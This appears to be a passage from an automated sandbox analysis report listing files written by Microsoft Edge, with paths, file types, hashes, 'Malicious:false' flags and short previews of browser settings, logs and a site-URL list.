                                                                                                                                                                                                                                                                                                                          Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6783EC68-1EF4.pma

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):4194304
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.4495165711602936
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:oz4MvntWYKs+AmjjzPkcQJ4rsmv1GzSqSGNCItHE22vwg1HFD:rMv7Ks+j7kcQi/MSqStItH/2vwaH5
                                                                                                                                                                                                                                                                                                                          MD5:6CB5354CC9B6AC050557E17E388EF719
                                                                                                                                                                                                                                                                                                                          SHA1:B99FAE5BE5079826D52CC438E6DC5617A1560801
                                                                                                                                                                                                                                                                                                                          SHA-256:CBFE3D95B0145EE5157A8A333910268902AAAE37A29B9743AAAF8D76703817CC
                                                                                                                                                                                                                                                                                                                          SHA-512:333406B0C6CC3C6EDBC603007DC592A6DBAE400A9463EF1A629B3B8EE1E592B77AD69E0E53FFD7A6ADEC2F1D08B18BCF435B821EAD3D896997EE197C1220235E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...@..@...@.....C.].....@...................................`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".bfsfmd20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2................. .`2.......

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):280
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                                                          MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                                                                          SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                                                                          SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                                                                          SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0d3be2b6-223b-4d4c-8c3b-52431bb60096.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17616), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):17620
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.493612710690866
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhVtvGUXBohbGIQwY6WZaTY7u:sTOxuJZfhGUWbGXflaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:C92DAEE44A4ABBD6F7F3D6D30537EBD0
                                                                                                                                                                                                                                                                                                                          SHA1:B8B12836F2E3BB55ABD5C04A84B9F1E449CC2240
                                                                                                                                                                                                                                                                                                                          SHA-256:9BE1F358C01B2D6F99C1515A538079781F4FAB1F0A8D134B9C9BDF5F5B693EC2
                                                                                                                                                                                                                                                                                                                          SHA-512:B06D92CE8B6E079F33965F8669CA961AE0909E2EED376D0E58EBCA4F812C028766CECD4E94C539F014FE317E413E5CAA363A25B291C400B0A8FCF1C9FA408CE8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\12342472-66c6-4619-8bc7-927ad3f86e72.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (17781), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):17785
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.490123600145908
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhVtvGUXBohbGIQwY6WhlaTY7u:sTOxuJZfhGUWbGXfraTY7u
                                                                                                                                                                                                                                                                                                                          MD5:497CC6F0F85209126008B53153E84555
                                                                                                                                                                                                                                                                                                                          SHA1:8323D50D4D53778EA615F7F4D27221E6DD6E4971
                                                                                                                                                                                                                                                                                                                          SHA-256:6147AC543C9E76CFC8C46F1D1B146B7AED375BF387ED760C893AB16F2B82518A
                                                                                                                                                                                                                                                                                                                          SHA-512:E47EBB22E93B250728B83D01CCE2B01B5DF4D972537CA23D3CAF28DDD2E8C0590A8138ABC5B28D3F9771B44327E87A9E8371A65AC7DD85744FCBB8A4B6AD7C8E
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\13e02091-6eb4-453c-b6d0-ee3bd36173ad.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):115717
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                                          MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                                          SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                                          SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                                          SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\25d9e339-072e-481f-9ba0-f3da1638337a.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\34e63e1f-38c6-47a6-acb6-b5c9d5972d55.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\8d214a5c-8952-4ead-8e70-cb71a09d5e96.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40470
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.560753544519266
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:CJakCwh7pLGLhgGWPSMfjV8F1+UoAYDCx9Tuqh0VfUC9xbog/OVPjcE0TMkUrwCo:CJakCwXchgGWPSMfjVu1jaSjx5kNCsDt
                                                                                                                                                                                                                                                                                                                          MD5:FB94C120A460C6DBF8F3B75F09ACEA38
                                                                                                                                                                                                                                                                                                                          SHA1:A39A52405F9F558420E46D1B63F7CD3545CA2B97
                                                                                                                                                                                                                                                                                                                          SHA-256:ACE8C49CEADDCD86E99105D08189D7EB16EC71E4CEAEA25E4BA82B382B21B4B0
                                                                                                                                                                                                                                                                                                                          SHA-512:C7CF43D840EA5BA37ACC9407ABE899127F14DE14C57994D73D5A30B6F99267DEB01536C71DD3C0086A8B38A175708ED0DFE48F99424998D3200CE612CC131CFD
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13381172585188217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13381172585188217","location":5,"ma

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):33
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                          MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                          SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                          SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                                          SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):309
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1986099810135125
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6umFUlRq1923oH+Tcwtp3hBtB2KLlguRQL+q2P923oH+Tcwtp3hBWsIFUv:76uyUYebp3dFLuuRVv4Yebp3eFUv
                                                                                                                                                                                                                                                                                                                          MD5:9860858FBC7C39C85D96200BB88B6E76
                                                                                                                                                                                                                                                                                                                          SHA1:F79183339D83EAC439E9DFE64BA0E943DEEDEC0F
                                                                                                                                                                                                                                                                                                                          SHA-256:DD43C7EF5B9F0F8E0B73F2363962FADABF410F19FE1EEF0723F73FA878C0872C
                                                                                                                                                                                                                                                                                                                          SHA-512:A940D097F5F5036877E2F596A38A6AED5310D951008707523833FEE8BCE0CDF249E776E657B8FC550E0BF022E898E2061BEF3A0165E4000EFC51FC2395DCF3EF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:10.124 1fc8 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2025/01/12-11:23:10.177 1fc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                                                          Size (bytes):2163821
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.222874028281433
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24576:v+/PN8FBfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN83fx2mjF
                                                                                                                                                                                                                                                                                                                          MD5:C7066867168A4B1123E7659B7AF384F6
                                                                                                                                                                                                                                                                                                                          SHA1:C75F2497C6F7A1833C946FDBFAF7D84B4F8F8388
                                                                                                                                                                                                                                                                                                                          SHA-256:4CB16DA312235E9581BF51F1946968E9AD6B030125279E93AB9365017D3DF8BF
                                                                                                                                                                                                                                                                                                                          SHA-512:925C4B7FFE7938BB77BC2788AF1A14F56877D52B45181241441C6CF520BDE8B23BE034AACBAEEC7BA529E423147CC84425D4FCA7990C161B717FCA4DE5CC22C4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):336
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.0996121297314145
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6un9+q2P923oH+Tcwt9Eh1tIFUtQuRJZmwuuk9VkwO923oH+Tcwt9Eh15LJ:76un9+v4Yeb9Eh16FUtQuRJ/uuk9V5Lw
                                                                                                                                                                                                                                                                                                                          MD5:BD52E4412765FAFA214D87F8B4205842
                                                                                                                                                                                                                                                                                                                          SHA1:93552BC8DFEF641D704A7C7D75DD549B0AE80AB5
                                                                                                                                                                                                                                                                                                                          SHA-256:9543DDBE696626DC0AA0FFCA9E77E66F4D0923A82688A741421B3A7527627DE2
                                                                                                                                                                                                                                                                                                                          SHA-512:E92E635ADD022822FFC97C863C24E8DAC3FE0BCC2F51FE8740BD43F8E51033914D0AC40B246A23EE34579186B70C846A5CA10682EFB8F37A8D25502B197E1A14
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:10.056 194c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2025/01/12-11:23:10.058 194c Recovering log #3.2025/01/12-11:23:10.062 194c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

